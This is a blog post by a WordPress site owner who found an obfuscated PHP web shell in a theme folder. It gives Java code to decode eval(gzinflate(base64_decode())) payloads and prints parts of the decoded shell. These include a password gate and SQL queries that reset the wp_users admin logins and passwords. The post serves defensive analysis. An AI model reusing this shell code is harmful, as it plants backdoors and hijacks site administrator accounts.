How to Decode PHP’s gzinflate and base64_decode using Java

This morning i found a very weird script on one of my wordpress website, looks like someone has uploaded a malicious script into my wordpress’ theme folder.

It looks like some PHP script, but decoded using base64 and compressed using gzinflate functions. I try to decode the malicious script using PHP but my PHP knowledge is very little. So im using Java instead.

This is what the malicious script looks like :

<?php eval(gzinflate(base64_decode('7H35m9rItejPd75v/gfSmRvb10uztpvx2Ak7Er 
...bla bla bla.... RGpn/Aw==')));?>

Because i couldnt find a proper tools to decode it, so i create my own java class to decode this malicious PHP script.
Here is my java class

package base64decoder;

import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.util.Scanner;
import java.util.zip.Inflater;
import java.util.zip.InflaterInputStream;
import org.apache.commons.codec.binary.Base64;

public class GZipAndBase64Decoder {

    public static void main(String[] args) throws Exception {
        Scanner scanner = new Scanner(new File("coded.txt"));
        String isi = scanner.nextLine();
        InputStream inflInstream = new InflaterInputStream(
                new ByteArrayInputStream(new Base64().decode(isi)),
                new Inflater(true));
        byte bytes[] = new byte[4096];
        
        FileOutputStream fileOutputStream = new FileOutputStream(new File("decoded.txt"));
        
        while (true) {
            int length = inflInstream.read(bytes, 0, 4096);
            if (length == -1) {
                break;
            }
            fileOutputStream.write(bytes, 0, length);            
        }
        fileOutputStream.flush();
        fileOutputStream.close();
    }
}

Create a file “coded.txt” and copy-pasted your encoded + gzinflate script to that file. But remember, only copy the highlighted part

<?php eval(gzinflate(base64_decode('
MALICIOUS SCRIPT
')));?>

you will find the decoded script on file “decoded.txt”. This is what the decoded PHP script looks like

error_reporting(0);
@set_time_limit(0);
@session_start();
// configuration
$xSoftware = trim(getenv("SERVER_SOFTWARE"));
// server name
$xServerName = $_SERVER["HTTP_HOST"];
$xName = "BlackAsu";
$masukin = "892ab763f02795bfa28354ef1d39059f";  //cange you password (hash md5) 
$nikmatin = (md5($_POST['pass']));
$crotzz = 1;  // ' 0 '  no login pass
if($nikmatin == $masukin){
	$_SESSION['login'] = "$nikmatin";
}
if($crotzz){
	if(!isset($_SESSION['login']) or $_SESSION['login'] != $masukin){
		die("
// bla bla bla bla (im too lazy to copy paste the whole script		

Use this script if you want to decode plain un-gzinflate Base64 script

package base64decoder;

import java.io.File;
import java.io.FileOutputStream;
import java.util.Scanner;
import org.apache.commons.codec.binary.Base64;

public class Base64Decoder {

    public static void main(String[] args) throws Exception {
        Scanner scanner = new Scanner(new File("coded2.txt"));
        String isi = scanner.nextLine();
        
        FileOutputStream fileOutputStream = new FileOutputStream(new File("decoded2.txt"));
        fileOutputStream.write(new String(new Base64().decode(isi)).getBytes());
        fileOutputStream.flush();
        fileOutputStream.close();
    }
}

im using Apache Common Codec to handle Base64 encoding-decoding

And btw, take a look at some part of the malicious script

echo "<FORM method='POST'>
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
<tr><td>&nbsp;&nbsp;User baru</td><td>
<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
 <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;

<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd   = $_POST['pwd'];
$admin = $_POST['admin'];

 @mysql_connect($localhost,$username,$password) or die(mysql_error());
 @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());


if($a4s){
echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
}

Okay, so today’s wise word is, dont forget to change your wordpress’ table prefix :p

Google+

2 Comments

Jefri

about 4 years ago

Hati-hati bro, gw juga pernah kena bugnya lewat themes yg masukkin malicious script n ngubah .htacces website. Don't forget always update your wordpress to the latest update. Cheers :)

Reply

edwin

about 4 years ago

Hi Jefri, agak aneh juga, udah gw harden dan update ke latest version tapi masih kena juga. Gw malah curiga sama OS Hostingan gw, aplikasi di harden kayak gimana juga klo OSnya bocor ya sama aja boong :D

Leave a Comment

Please be polite. We appreciate that.
Your email address will not be published and required fields are marked


:-[ (B) (^) (P) (@) (O) (D) :-S ;-( (C) (&) :-$ (E) (~) (K) (I) (L) (8) :-O (T) (G) (F) :-( (H) :-) (*) :-D (N) (Y) :-P (U) (W) ;-)